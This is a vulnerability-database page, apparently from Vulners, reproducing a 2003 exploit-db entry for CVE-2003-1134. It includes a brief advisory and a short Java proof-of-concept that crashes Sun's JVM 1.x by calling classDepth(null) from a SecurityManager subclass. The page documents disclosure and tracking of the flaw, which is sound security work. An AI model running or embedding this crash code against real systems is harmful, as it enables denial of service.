Lucene search
+L

Sun Microsystems Java Virtual Machine 1.x - Security Manager Denial of Service

🗓️ 26 Oct 2003 00:00:00Reported by Marc SchoenefeldType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 25 Views

Vulnerability in Sun Java Virtual Machine allows denial of service via the Security Manager implementation.

Related
Code
ReporterTitlePublishedViews
Family
cve
CVE
CVE-2003-1134
10 May 200504:00
cve
cvelist
Cvelist
CVE-2003-1134
10 May 200504:00
cvelist
euvd
EUVD
EUVD-2003-1124
7 Oct 202500:30
euvd
nvd
NVD
CVE-2003-1134
31 Dec 200305:00
nvd
redhatcve
RedhatCVE
CVE-2003-1134
9 Jan 202611:38
redhatcve
source: https://www.securityfocus.com/bid/8892/info

A problem has been reported in the Sun Microsystems Java Virtual Machine that occurs when implementing the Security Manager. Because of this, an attacker may be able to crash the virtual machine.

/* InsecurityManager-Demonstration */
/* coded by Marc Schoenefeld */
public class InSecurityManager extends SecurityManager {

public void doit() {
System.out.println("doit");
int o = classDepth(null);
}

public static void main(String[] a) {
InSecurityManager m = new InSecurityManager();
m.doit();
}
}

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

11 Dec 2012 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 22.1
EPSS0.00802
25